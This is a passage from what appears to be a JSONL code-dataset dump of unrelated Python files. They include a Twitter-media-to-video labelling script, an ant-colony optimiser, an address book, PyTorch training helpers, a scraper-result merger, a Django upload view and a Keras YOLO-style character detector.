pad=1280:720:(ow-iw)/2:(oh-ih)/2\" -c:v libx264 -b:v 10M -pix_fmt yuv420p -r 30 -shortest -avoid_negative_ts make_zero -fflags +genpts -t 1 tmp_{}.mp4''').format(str(i).zfill(4) , str(i).zfill(4)),\n\t\t\t\tcwd=os.path.dirname(os.path.realpath(__file__)), shell=True, env=dict(os.environ, PATH=\"C:/Users/johnidel/Downloads/ffmpeg-20180201-b1af0e2-win64-static/ffmpeg-20180201-b1af0e2-win64-static/bin\"))\n\t\texcept Exception as e:\n\t\t\traise e\n\n\twith open(\"tmp_files.txt\", \"w\") as f:\n\t\tfor i in range(len(images)):\n\t\t\tf.write(\"file 'tmp_{}.mp4'\\n\".format(str(i).zfill(4)))\n\n\ttry:\n\t\tsubprocess.call(\"ffmpeg -f concat -i tmp_files.txt \" + output,\n\t\t\tcwd=os.path.dirname(os.path.realpath(__file__)),\n\t\t\tshell=True,\n\t\t\tenv=dict(os.environ))\n\texcept Exception as e:\n\t\traise e\n\t\t\t\n\t#cleanup temp files\n\tfor i in range(len(images)):\n\t\tos.remove(\"tmp_{}.jpg\".format(str(i).zfill(4)))\n\t\tos.remove(\"tmp_{}.mp4\".format(str(i).zfill(4)))\n\tos.remove(\"tmp_files.txt\".format(str(i).zfill(4)))\n\n\treturn output\n\ndef video_analysis(filename):\n\t\"\"\"Generate list of labels for a specified mp4 file, using Google cloud ideo intelligence\n\n\tOuput is of form: \n\t\t[{start: 0, end: 1, labels: [(\"cat\", .56), (\"animal>dog\", .2)]}]\n\t\tEach labels is broken up by (category > categy > ... > entity , confidence level)\n\n Args:\n filename (str): Filename of input .mp4 file\n\n Returns:\n list: list of segments and labels, sorted by start time of each shot\n\n \"\"\"\n\tcredentials = service_account.Credentials.from_service_account_file(\n\t 'googe.dat')\n\ttry:\n\t\tclient = videointelligence.VideoIntelligenceServiceClient(\n\t\t\tcredentials=credentials\n\t\t)\n\texcept Exception as e:\n\t\traise e\n\n\ttry:\n\t\twith open(filename, \"rb\") as f:\n\t\t\tvideo_data = f.read()\n\texcept Exception as e:\n\t\traise e\n\n\ttry:\n\t\tresult = client.annotate_video(\n\t\t\tinput_content=video_data,\n\t\t\tfeatures=['LABEL_DETECTION'],\n\t\t).result()\n\texcept Exception as e:\n\t\traise e\n\n\treturn result\n\ndef get_twitter_media_analysis(screen_name, count=200, exclude_replies=True, output_name=\"output.mp4\", delete_movie=True):\n\t\"\"\"Generate list of labels from the video anaylsis of a specified users twitter timeline\n\n\tOuput is of form: \n\t\t[{start: 0, end: 1, labels: [(\"cat\", .56), (\"animal>dog\", .2)]}]\n\t\tEach labels is broken up by (category > categy > ... > entity , confidence level)\n\n Args:\n screen_name (str): Twitter screenname associated with desired timeline\n\n Keyword Arguments (optional):\n count (int): Number of tweets to look through (capped at 200 per api limits). Default: 200\n exclude_replies (bool): Exclude media found in tweets where specified user only replied. Default: True\n output_name (str): Filename of input .mp4 file. Default: output.mp4\n\t delete_movie (bool): Specified whether or not to remove local file after analysis. Default: True\n\n Returns:\n list: list of segments and labels, sorted by start time of each shot\n\n \"\"\"\n\timages = get_timeline_media_urls(screen_name, count, exclude_replies)\n\toutput_filename_actual = urls_to_movie(images, output=output_name)\n\tresult = video_analysis(output_filename_actual)\n\tif delete_movie:\n\t\tos.remove(output_name)\n\n\tanalysis_json = json.loads(MessageToJson(result)) \n\n\tsegments = dict()\n\t#only one video submitted\n\tfor shot_label in analysis_json[\"annotationResults\"][0][\"shotLabelAnnotations\"]:\n\t\tentity = [shot_label[\"entity\"][\"description\"]]\n\t\tif \"categoryEntities\" in shot_label.keys():\n\t\t\tfor category_entity in shot_label[\"categoryEntities\"]:\n\t\t\t\tentity.append(category_entity[\"description\"])\n\t\t\tentity = entity[::-1]\n\n\t\tentity = \">\".join(entity)\n\n\t\tfor segment in shot_label[\"segments\"]:\n\t\t\tseg = segment[\"segment\"]\n\t\t\ttime = (float(seg[\"startTimeOffset\"][:-1]), float(seg[\"endTimeOffset\"][:-1]))\n\t\t\tif time not in segments.keys():\n\t\t\t\tsegments[time] = dict(start=time[0], end=time[1], labels=[(entity, segment[\"confidence\"])])\n\t\t\telse:\n\t\t\t\tsegments[time][\"labels\"].append((entity, segment[\"confidence\"]))\n\n\tresults = []\n\tfor key in segments.keys():\n\t\tresults.append(segments[key])\n\tresults = sorted(results, key= lambda x: x[\"start\"])\n\t\n\treturn results\n\nif __name__ == \"__main__\":\n\tget_twitter_media_analysis(\"dannygarcia95\", count=100, delete_movie=False)\n","sub_path":"twitter_to_movie.py","file_name":"twitter_to_movie.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"510567770","text":"import pygame\npygame.init()\n\npygame.display.set_mode((500,500));\n\nrunning=True\n\nwhile running: #game loop begins\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n running=False\n\n pygame.display.update()\n\n\n","sub_path":"tuto1.py","file_name":"tuto1.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"512503372","text":"from ACO import ACO\nimport numpy as np\nimport random\nimport math\nimport time\n\nclass ANT:\n def __init__(self, start_node, nodes, edges, edges_pheromones, MAX_COST=1000, MAX_STEPS=12, MAX_PHEROMONES=1000, MIN_PHEROMONES=1, REQUIRED_STEPS=None, target_node=None):\n\n self.MAX_COST=MAX_COST\n\n # Start node of the ANT\n self.node = start_node\n\n self.MAX_STEPS = MAX_STEPS\n self.REQUIRED_STEPS = REQUIRED_STEPS\n self.MIN_PHEROMONES = MIN_PHEROMONES\n self.MAX_PHEROMONES = MAX_PHEROMONES\n self.target_node = target_node\n\n self.step = 0\n\n # Dataset\n self.nodes = nodes\n self.edges = edges\n self.edges_pheromones = edges_pheromones\n\n # Edges the ANT already used\n #\n self.possible_edges = {\n self.node.idx: self.edges[self.node.idx]\n }\n\n self.visited_nodes = set()\n\n # Add start node to visited nodes\n self.visited_nodes.add(self.node.idx)\n\n self.visited_edges = []\n\n def current_viable_edges(self):\n viable_edges_unordered = [(self.node.idx, y) for y in range(len(self.possible_edges[self.node.idx]))\n if y not in self.visited_nodes\n and y != self.target_node.idx]\n\n viable_edges_ordered = []\n \n for edge in viable_edges_unordered:\n distance = self.edges[edge[0]][edge[1]]\n\n\n\n\n\n\n return viable_edges_unordered\n\n\n def edge_cost_sum(self):\n return sum([self.edges[idxs[0]][idxs[1]] for idxs in self.visited_edges])\n\n\n def roulette_wheel(self):\n\n viable_edges = self.current_viable_edges()\n\n sum_pheromones = sum([self.edges_pheromones[viable_edge[0]][viable_edge[1]] for viable_edge in viable_edges])\n\n\n random_number = random.uniform(0, sum_pheromones)\n\n roulette_sum = 0\n for edge in viable_edges:\n roulette_sum += self.edges_pheromones[edge[0], edge[1]]\n\n if roulette_sum >= random_number:\n return edge\n\n\n\n\n\n def walk(self):\n\n while self.node != self.target_node:\n\n # Ant walks onto a edge\n current_edge = self.roulette_wheel()\n\n if current_edge is None:\n current_edge = (self.node.idx, self.target_node.idx)\n elif self.MAX_STEPS != None and self.MAX_STEPS -1 == self.step:\n current_edge = (self.node.idx, self.target_node.idx)\n\n self.visited_nodes.add(current_edge[1])\n self.visited_edges.append(current_edge)\n self.node = self.nodes[current_edge[1]]\n\n try:\n self.possible_edges[self.node.idx]\n except:\n self.possible_edges[self.node.idx] = self.edges[self.node.idx]\n\n self.step += 1\n\n return self.node\n\n def pheromones(self):\n # x ---- 200 ---- x ----- 400 ----- x ----- 100 ---- x ----- 2000 ---- x\n\n current_pheromones = 0\n current_cost = 0\n #score = 1000**(1-float(self.edge_cost_sum())/self.MAX_COST) # Score function\n\n\n for idx, v_edge in enumerate(self.visited_edges):\n\n #current_pheromones = current_pheromones + self.edges_pheromones[v_edge[0]][v_edge[1]]\n #current_cost = current_cost + self.edges[v_edge[0]][v_edge[1]]\n\n score = ((1 - 1) * self.edges_pheromones[v_edge[0]][v_edge[1]]) + (1 / self.edge_cost_sum())\n new_score = self.edges_pheromones[v_edge[0]][v_edge[1]] + score\n #score = 1000**(1-float(current_cost)/self.MAX_COST) # Score function\n #print(score)|\n\n #score = 1 * math.pow(self.edges_pheromones[v_edge[0]][v_edge[1]], 2) + 0.5\n #score = 1*math.pow(((1 - .90) * self.edges_pheromones[v_edge[0]][v_edge[1]]) + (1 / self.edge_cost_sum()),2)+0.5\n\n if new_score <= self.MIN_PHEROMONES:\n self.edges_pheromones[v_edge[0]][v_edge[1]] = self.MIN_PHEROMONES\n elif new_score >= self.MAX_PHEROMONES:\n self.edges_pheromones[v_edge[0]][v_edge[1]] = self.MAX_PHEROMONES\n else:\n self.edges_pheromones[v_edge[0]][v_edge[1]] = new_score\n\n\n","sub_path":"ACO/Ant.py","file_name":"Ant.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"251449705","text":"# Filename: address_book.py\n\n'''Create your own command-line address-book program using which you can browse, add,\nmodify, delete or search for your contacts such as friends, family and colleagues\nand their information such as email address and/or phone number. Details must\nbe stored for later retrieval.'''\n\n\nimport pickle, os\n\n# Path to our address book.\naddressbook_path =r'C:\\Users\\Akshay\\Desktop\\Python Code\\address_book.info'\n\n# Class for a contact.\nclass contact:\n def __init__(self,name,phone,email):\n self.name=name\n self.phone=phone\n self.email=email\n def add(self):\n global ab\n ab[self.name]=self\n def delete(self):\n global ab\n del ab[self.name]\n def modify(self):\n field=raw_input(\"Enter 0 to modify phone number or 1 to modify email ID: \")\n new=raw_input(\"Enter the new value for the field: \")\n if field=='0':\n self.phone=new\n elif field=='1':\n self.email=new\n else:\n print (\"Incorrect input!\")\n del new\n del field\n def display(self):\n print (\"Contact : {}\".format(self.name))\n print (\"Phone : {}\".format(self.phone))\n print (\"Email : {}\".format(self.email))\n print (\"\")\n\n\nif os.path.exists(addressbook_path):\n try:\n f = open(addressbook_path,'rb')\n ab = pickle.load(f)\n f.close()\n except EOFError:\n ab={}\nelse:\n ab={}\n\n\n# Chooses where the 'mode' variable is defined.\nwhile(True):\n mode = raw_input('\\nWelcome to your Address Book!\\nHere are your options:\\\n Browse, Add, Modify, Delete, Search or Exit?: ')\n print(\"\")\n # Switch statement detailing what mode we want to use our address book in.\n if mode == 'Browse':\n print(\"These are the contacts in your Address Book: \")\n print(\"\")\n for obj in ab.values():\n obj.display()\n \n elif mode == 'Add':\n name=raw_input(\"Enter the Name of the new contact: \")\n phone=raw_input(\"Enter the Phone# of the new contact: \")\n email=raw_input(\"Enter the Email of the new contact: \")\n p=contact(name,phone,email)\n p.add()\n \n \n elif mode == 'Modify':\n name= raw_input(\"Enter the name of the contact for which modification is to be made: \")\n if name in ab.keys():\n ab[name].modify()\n else:\n print (\"Contact does not exist.\")\n \n\n elif mode == 'Delete':\n name= raw_input(\"Enter the name of the contact which is to be deleted: \")\n if name in ab.keys():\n del ab[name]\n else:\n print(\"Contact does not exist.\")\n\n elif mode == 'Search':\n name= raw_input(\"Enter the name of the contact which is to be displayed: \") \n if name in ab.keys():\n ab[name].display()\n else:\n print(\"Contact does not exist.\")\n\n elif mode == 'Exit':\n break\n\n else:\n print('\\nTypo bro!\\n')\n\n f = open(addressbook_path,'wb')\n pickle.dump(ab,f)\n f.close()\n","sub_path":"address_book.py","file_name":"address_book.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"97888983","text":"import smart_open\nsmart_open.open = smart_open.smart_open\nfrom gensim.models.word2vec import Word2Vec\nimport gensim.downloader as api\nimport numpy as np\nimport torch\nimport json\nimport pandas as pd\nimport string\nimport pickle as pkl\nimport re\nfrom transformers import BertTokenizer, BertForSequenceClassification\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader, RandomSampler\nfrom torch.nn.utils.rnn import pad_sequence\nimport os\nimport random\nimport csv\n\nSEED = 2021\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\nrandom.seed(SEED)\nnp.random.seed(SEED)\n\ndef confusion_matrix(gt_list, pred_list):\n from sklearn.metrics import confusion_matrix\n confusion_mat = confusion_matrix(np.concatenate(gt_list,axis=0),np.concatenate(pred_list,axis=0))\n return confusion_mat\n\ndef test(model,\n test_loader,\n device = None,\n return_pred_list = False):\n \n # initialize running values\n model.eval()\n correct = 0\n total = 0\n pred_list = []\n gt_list = []\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n #print(i)\n tokens_tensors, labels= data[0], data[1]\n tokens_tensors, labels = tokens_tensors.to(device), labels.to(device)\n outputs = model(tokens_tensors) \n pred = torch.argmax(outputs, 1) \n #labels = labels.cpu().detach().numpy()\n pred_list += [pred.cpu().detach().numpy()]\n gt_list += [labels.cpu().detach().numpy()] \n total += labels.size(0) \n labels = labels.reshape(-1)\n correct += (pred == labels).sum().item()\n\n \n if return_pred_list:\n return correct/total, confusion_matrix(gt_list, pred_list), pred_list\n return correct/total, confusion_matrix(gt_list, pred_list)\n\n\ndef eva_and_csv(model,\n dev_data, \n test_loader,\n device = None):\n \n # initialize running values\n model.eval()\n correct = 0\n total = 0\n pred_list = []\n gt_list = []\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n #print(i)\n tokens_tensors = data\n tokens_tensors = tokens_tensors.to(device)\n outputs = model(tokens_tensors) \n pred = torch.argmax(outputs, 1)\n pred_list += [pred.cpu().detach().numpy()]\n\n pred_list_np = np.concatenate(pred_list)\n \n with open('round2_own_classifier_only_article_epoch_10_eval.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['idx', 'context_idx', 'label'])\n data_dict={}\n label_idx = 0\n for data in dev_data:\n idx = data['idx']\n if idx not in data_dict:\n data_dict[idx] = {\n 'idx': idx,\n 'label': pred_list_np[label_idx]\n }\n label_idx += 1\n writer.writerow([idx, data['context_idx'], 'real' if data_dict[idx]['label'] else 'fake'])\n\n\ndef train(model,\n optimizer,\n train_loader,\n criterion = nn.CrossEntropyLoss(), \n epoch = 0 ,\n best_valid_loss = float(\"Inf\"),\n output_PATH = None, \n device = None):\n \n # initialize running values\n running_loss = 0.0\n valid_running_loss = 0.0\n global_step = 0\n train_loss_list = []\n valid_loss_list = []\n global_steps_list = []\n\n # training loop\n model.train()\n #for epoch in range(num_epochs):\n correct = 0\n total = 0\n for i, data in enumerate(train_loader):\n tokens_tensors, labels= data[0], data[1]\n tokens_tensors, labels = tokens_tensors.to(device), labels.to(device)\n outputs = model(tokens_tensors) \n loss = criterion(outputs, labels)\n pred = torch.argmax(outputs, 1)\n total += labels.size(0)\n labels = labels.reshape(-1)\n correct += (pred == labels).sum().item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # update running values\n running_loss += loss.item()\n global_step += 1\n #print(running_loss/global_step)\n torch.save(model, output_PATH+'/model_' + str(epoch) +'.pth')\n print('running loss:' + str(running_loss/global_step))\n print('train acc:', str(correct/total))\n return model","sub_path":"NLP_embedding/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"401588776","text":"from utils import cleaner, ddmdata\nimport os\nimport sys\nfrom more_itertools import unique_everseen as unique\n\nstartup_list = cleaner.clean(ddmdata.readcsv(sys.argv[1]))\nsl_name = sys.argv[1].replace('.csv', '')\nss_results = ddmdata.readcsv(sys.argv[2])\n\n#Initializes the result groups list and index dict which will group base URLs together\nresult_groups = []\nindex_dict = {}\ncurrent_index = 0\n\n#Groups results of the same base URL in a list of lists\nfor result in ss_results:\n base_url = result['base_url']\n if base_url in index_dict:\n result_groups[index_dict[base_url]].append(result)\n else:\n index_dict[base_url] = current_index\n result_list = [result]\n result_groups.append(result_list)\n current_index += 1\n\nfinal_results = []\n\nfor result_group in result_groups:\n\n final_result = {}\n cnpj_list = []\n facebook_list = []\n linkedin_list = []\n twitter_list = []\n instagram_list = []\n email_list = []\n\n for result in result_group:\n\n cnpj_list += result['cnpj_all'].split(',')\n facebook_list += result['facebook_all'].split(',')\n linkedin_list += result['linkedin_all'].split(',')\n twitter_list += result['twitter_all'].split(',')\n instagram_list += result['instagram_all'].split(',')\n email_list += result['email_all'].split(',')\n\n if len(result_group) == 1 or result['depth'] == '0':\n final_result['Response'] = result['response']\n final_result['base_url'] = result['base_url']\n final_result['final_url'] = result['final_url']\n if result['final_url']:\n final_result['Site final'] = cleaner.clean_site(result['final_url'])\n else:\n final_result['Site'] = cleaner.clean_site(result['base_url'])\n\n final_result['CNPJ'] = ','.join(sorted(list(unique(cnpj_list))))\n final_result['Facebook'] = ','.join(sorted(list(unique(facebook_list))))\n final_result['LinkedIn'] = ','.join(sorted(list(unique(linkedin_list))))\n final_result['Twitter'] = ','.join(sorted(list(unique(twitter_list))))\n final_result['Instagram'] = ','.join(sorted(list(unique(instagram_list))))\n final_result['E-mail'] = ','.join(sorted(list(unique(email_list))))\n\n final_results.append(final_result)\n\nfinal_results = cleaner.clean(final_results)\n\nadd_keys = ['Facebook', 'LinkedIn', 'Twitter', 'Instagram', 'E-mail']\nreplace_keys = ['Site final', 'Response']\nadd_if_empty_keys = ['CNPJ']\n\nfor startup in startup_list:\n clean_site = cleaner.clean_site(startup['Site'])\n for result in final_results:\n result_site = cleaner.clean_site(result['base_url'])\n if clean_site == result_site:\n for key in add_keys:\n current_list = startup[key].split(',')\n new_list = result[key].split(',')\n final_list = sorted(list(unique(current_list + new_list)))\n while '' in final_list:\n final_list.remove('')\n startup[key] = ','.join(final_list)\n for key in replace_keys:\n new_list = result[key].split(',')\n final_list = sorted(list(unique(new_list)))\n while '' in final_list:\n final_list.remove('')\n startup[key] = ','.join(final_list)\n for key in add_if_empty_keys:\n if not startup[key]:\n new_list = result[key].split(',')\n final_list = sorted(list(unique(new_list)))\n while '' in final_list:\n final_list.remove('')\n startup[key] = ','.join(final_list)\n\nerror_list = ['DNSLookupError', 'ResponseNeverReceived', 'TimeoutError']\n\nfor startup in startup_list:\n for error in error_list:\n if error in startup['Response']:\n startup['Response'] = error\n\nddmdata.writecsv(startup_list, '{}_ss_merged.csv'.format(sl_name))\n","sub_path":"siteScraperMerge.py","file_name":"siteScraperMerge.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446541421","text":"# -*- coding: utf-8 -*-\n\n#######################################################\n# Отображение галереи + Аватар\n#######################################################\n\nfrom webservice.forms import UploadImageForm\nfrom django.core.context_processors import csrf\nfrom webservice.models import Images\nfrom django.shortcuts\t\t\t\timport render_to_response\nfrom django.template import RequestContext\nfrom datetime import datetime\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\n\ndef images(request):\n\tif request.user.is_authenticated() is False:\n\t\treturn HttpResponseRedirect('/')\n\telif request.user.is_authenticated() is True:\n\t\tupload_image_form = UploadImageForm(auto_id='id_images_%s')\n\t\tsession = request.user\n\t\tc = {'session': session, 'upload_image_form': upload_image_form}\n\t\tc.update(csrf(request))\n\t\tif request.method == 'POST':\n\t\t\tform = UploadImageForm(request.POST, request.FILES)\n\t\t\tif form.is_valid():\n\t\t\t\tupload_image_entry = Images(owner=request.user,\n\t\t\t\t\tdescription=form.cleaned_data['description'],\n\t\t\t\t\tis_deleted=False,\n\t\t\t\t\tis_avatar=False,\n\t\t\t\t\tfilepath=form.cleaned_data['image'],\n\t\t\t\t\tdatetime=datetime.now())\n\t\t\t\tupload_image_entry.save()\n\t\t\t\treturn HttpResponse('saved')\n\t\t\treturn HttpResponse('form is not valid!')\n\t\t#запилить вывод картинок\n\t\timageObjects = Images.objects.filter(owner=request.user)\n\t\tpictures = []\n\t\tdescriptions = []\n\t\tfor element in imageObjects:\n\t\t\tpictures.append(element.filepath)\n\t\t\tdescriptions.append(element.description)\n\t\tc['pictures'] = pictures\n\t\tc['descriptions'] = descriptions\n\t\treturn render_to_response('images.html', c, context_instance=RequestContext(request))","sub_path":"sevenrows/webservice/views/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"147528727","text":"import keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Flatten, Input, Reshape\nfrom keras.layers import Conv2D, MaxPooling2D, BatchNormalization\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU, ELU\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.utils import np_utils\n\nimport numpy as np\n\nfrom PIL import Image, ImageDraw, ImageFont\n\nimport matplotlib.pyplot as plt\n\nnb_boxes = 1#lossYOLO_MultiDimensional n'est pas implementée pour nb_boxes > 1 ; Utiliser lossYOLO_1D a la place (TODO)\ngrid_w = 4\ngrid_h = 4\ncell_w = 16\ncell_h = 16\nimg_w = grid_w * cell_w\nimg_h = grid_h * cell_h\n\nVOCAB = ['A', 'B', 'C']\nL_VOC = len(VOCAB)\n\nFONTS=['datas/fonts/0.ttf',\n 'datas/fonts/1.ttf',\n 'datas/fonts/2.otf',\n 'datas/fonts/3.ttf',\n 'datas/fonts/4.otf',\n 'datas/fonts/5.otf',\n 'datas/fonts/6.otf']\n\nBatchSize = 4\n\ndef tokenizeY(strTab, vocab):\n #Texte ver OneHot\n onehotData = []\n for char in strTab:\n onehotData.append(vocab.index(char))\n \n data = np.array(onehotData)\n encoded = np_utils.to_categorical(data, num_classes=len(vocab))\n \n return encoded\n\ndef genElement(p=0.1, dbg=None):\n while True:\n #Genere l'image\n img = Image.new('RGB', (img_w, img_h))\n drw = ImageDraw.Draw(img)\n \n #Liste des predictions a faire (batch)\n prd = []\n \n #Utilise une generation deterministe (utile a des fins de debug)\n #Shape : (grid_h * grid_w * nb_box, [classe, x, y, largeur, hauteur, confidence])\n if dbg != None:\n i = 0\n for y in range(grid_h):\n for x in range(grid_w):\n row = dbg[i]\n i += 1\n \n #Choisir le caractere\n carac = row[0]\n \n #Contient les elements de prediction de la cellule courrante\n p_elm = []\n p_elm.extend(tokenizeY(carac, VOCAB).tolist()[0])\n \n #Pour chaque box\n for z in range(nb_boxes):\n #Determine la forme du caractere\n c_pol = 25\n c_fnt = ImageFont.truetype(FONTS[0], c_pol)\n c_rgb = (np.random.randint(64, 256), np.random.randint(64, 256), np.random.randint(64, 256))\n c_wdt, c_hgt = c_fnt.getsize(carac)\n \n #Choisi une coordonnée dans la region (le centre de la boite doit etre inclu dans la region)\n x_box = row[z*(2+2+1) + 1]\n y_box = row[z*(2+2+1) + 2]\n \n #Determine la position absolue du caractere\n x_car = (cell_w * x) + x_box - (c_wdt / 2.0)\n y_car = (cell_h * y) + y_box - (c_hgt / 2.0)\n \n #Dessine le carctere\n drw.text((x_car, y_car), carac, font=c_fnt, fill=c_rgb)\n \n #Peuple l'element de prediction\n p_elm.append(x_box / cell_w)\n p_elm.append(y_box / cell_h)\n p_elm.append(c_wdt / img_w)\n p_elm.append(c_hgt / img_h)\n p_elm.append(1.0)\n\n prd.append(p_elm)\n yield img, prd\n continue\n\n #Parcour de l'image dans le sens de lecture\n for y in range(grid_h):\n for x in range(grid_w):\n #Determine si la grille va contenir un caractere\n c_prb = p\n c_win = np.random.choice([True, False], p=[c_prb, 1.0-c_prb])\n \n #Si la grille doit contenir un caractere\n if c_win:\n #Determine le nombres de caracteres de meme type que la grille doit contenir\n c_cpt = np.random.randint(nb_boxes)\n \n #Choisir un caractere au hasard\n carac = np.random.choice(VOCAB)\n \n #Contient les elements de prediction de la cellule courrante\n p_elm = []\n p_elm.extend(tokenizeY(carac, VOCAB).tolist()[0])\n \n #Pour chaque box\n for z in range(nb_boxes):\n #Place un caractere si le compteur n'est pas epuisé\n if z <= c_cpt:\n #Determine la forme du caractere\n c_pol = np.random.randint(15, 35)\n c_fnt = ImageFont.truetype(np.random.choice(FONTS), c_pol)\n c_rgb = (np.random.randint(64, 256), np.random.randint(64, 256), np.random.randint(64, 256))\n c_wdt, c_hgt = c_fnt.getsize(carac)\n \n #Choisi une coordonnée dans la region (le centre de la boite doit etre inclu dans la region)\n x_box = np.random.randint(0, cell_w)\n y_box = np.random.randint(0, cell_h)\n \n #Determine la position absolue du caractere\n x_car = (cell_w * x) + x_box - (c_wdt / 2.0)\n y_car = (cell_h * y) + y_box - (c_hgt / 2.0)\n \n #Dessine le carctere\n drw.text((x_car, y_car), carac, font=c_fnt, fill=c_rgb)\n \n #Peuple l'element de prediction\n p_elm.append(x_box / cell_w)\n p_elm.append(y_box / cell_h)\n p_elm.append(c_wdt / img_w)\n p_elm.append(c_hgt / img_h)\n p_elm.append(1.0)\n else:\n #Peuple l'element de prediction\n p_elm.append(0.0)\n p_elm.append(0.0)\n p_elm.append(0.0)\n p_elm.append(0.0)\n p_elm.append(0.0)\n else:\n #Contient les elements de prediction de la cellule courrante\n p_elm = []\n p_elm.extend([0.0] * L_VOC)\n \n #Pour chaque box\n for z in range(nb_boxes):\n #Peuple l'element de prediction\n p_elm.append(0.0)\n p_elm.append(0.0)\n p_elm.append(0.0)\n p_elm.append(0.0)\n p_elm.append(0.0)\n\n prd.append(p_elm)\n\n yield img, prd\n\ndef genDataset(N=1, dbg=None):\n gen = genElement(p=0.15, dbg=dbg)\n \n while True:\n n_train = N\n x_train = []\n y_train = []\n \n for i in range(n_train):\n x, y = next(gen)\n x_train.append(img_to_array(x))\n y_train.append(y)\n \n yield np.array(x_train), np.array(y_train)\n\ndef getBoxedImg(img, prd, seuil=0.25):\n drw = ImageDraw.Draw(img)\n out = np.reshape(prd, (grid_h, grid_w, L_VOC+nb_boxes*(2+2+1)))\n \n #Parcour de l'image dans le sens de lecture\n for y in range(grid_h):\n for x in range(grid_w):\n box = out[y, x] \n b_c = VOCAB[np.argmax(box[0:L_VOC])]\n \n for z in range(nb_boxes):\n b_f = box[L_VOC + z*(2+2+1) + 4]\n \n if b_f < seuil:\n continue\n \n b_w = box[L_VOC + z*(2+2+1) + 2] * img_w\n b_h = box[L_VOC + z*(2+2+1) + 3] * img_h\n b_x = box[L_VOC + z*(2+2+1) + 0] * cell_w + (cell_w * x) - (b_w / 2.0)\n b_y = box[L_VOC + z*(2+2+1) + 1] * cell_h + (cell_h * y) - (b_h / 2.0)\n \n #drw.text((b_x, b_y), b_c)\n drw.rectangle((b_x, b_y, b_x+b_w, b_y+b_h), outline=(255, 0, 0))\n print('({0},{1},{2}) : \\'{3}\\' > {4:.3f}'.format(y, x, z, b_c, b_f))\n print('')\n \n return img\n\ndef lossYOLO_MultiDimensional(y_true, y_pred):\n #Constantes d'apprentissages\n lambda_coord = 5\n lambda_noobj = 0.5\n n_features = L_VOC+nb_boxes*(2+2+1)\n Shape_Full = (BatchSize, grid_h*grid_w, n_features)\n Shape_Class = (BatchSize, grid_h*grid_w, L_VOC)\n Shape_XY = (BatchSize, grid_h*grid_w, 1)\n Shape_WH = (BatchSize, grid_h*grid_w, 1)\n Shape_CF = (BatchSize, grid_h*grid_w, 1)\n \n np_mask_x = np.zeros(Shape_Full)\n np_mask_x[...,L_VOC+0] = 1\n Mask_X = K.variable(np_mask_x)\n \n np_mask_y = np.zeros(Shape_Full)\n np_mask_y[...,L_VOC+1] = 1\n Mask_Y = K.variable(np_mask_y)\n \n Mask_XY = Mask_X + Mask_Y\n \n np_mask_w = np.zeros(Shape_Full)\n np_mask_w[...,L_VOC+2] = 1\n Mask_W = K.variable(np_mask_w)\n \n np_mask_h = np.zeros(Shape_Full)\n np_mask_h[...,L_VOC+3] = 1\n Mask_H = K.variable(np_mask_h)\n \n Mask_WH = Mask_W + Mask_H\n \n np_mask_cl = np.zeros(Shape_Full)\n np_mask_cl[...,:L_VOC] = 1\n Mask_CL = K.variable(np_mask_cl)\n \n np_mask_cf = np.zeros(Shape_Full)\n np_mask_cf[...,L_VOC+4] = 1\n Mask_CF = K.variable(np_mask_cf)\n \n #Variables\n loss = K.zeros(Shape_Full)\n\n #Exctraction haut niveau des variables\n y_true_class = K.reshape(y_true[..., :L_VOC], (-1, L_VOC))\n y_pred_class = K.reshape(y_pred[..., :L_VOC], (-1, L_VOC))\n y_true_boxes = K.transpose(K.reshape(y_true[..., L_VOC:], (-1, 2+2+1)))\n y_pred_boxes = K.transpose(K.reshape(y_pred[..., L_VOC:], (-1, 2+2+1)))\n y_true_x = y_true_boxes[0]\n y_pred_x = y_pred_boxes[0]\n y_true_y = y_true_boxes[1]\n y_pred_y = y_pred_boxes[1]\n y_true_dw = y_true_boxes[2]\n y_pred_dw = y_pred_boxes[2]\n y_true_dh = y_true_boxes[3]\n y_pred_dh = y_pred_boxes[3]\n y_true_cf = y_true_boxes[4]\n y_pred_cf = y_pred_boxes[4]\n\n ### Loss des classes\n cl_errors = K.square(y_true_class - y_pred_class)\n cl_errors = K.repeat_elements(cl_errors, nb_boxes, 0)\n \n pocl_mask = K.repeat_elements(y_true_cf, L_VOC, 0)\n pocl_loss = K.flatten(cl_errors) * pocl_mask\n pocl_fill = K.zeros((BatchSize, grid_h*grid_w, n_features-L_VOC))\n pocl_loss = K.reshape(pocl_loss, (Shape_Class))\n pocl_loss = K.concatenate([pocl_loss, pocl_fill])\n\n nocl_mask = K.repeat_elements(K.abs(1.0 - y_true_cf), L_VOC, 0)\n nocl_loss = K.flatten(cl_errors) * nocl_mask\n nocl_fill = K.zeros((BatchSize, grid_h*grid_w, n_features-L_VOC))\n nocl_loss = K.reshape(nocl_loss, (Shape_Class))\n nocl_loss = K.concatenate([nocl_loss, 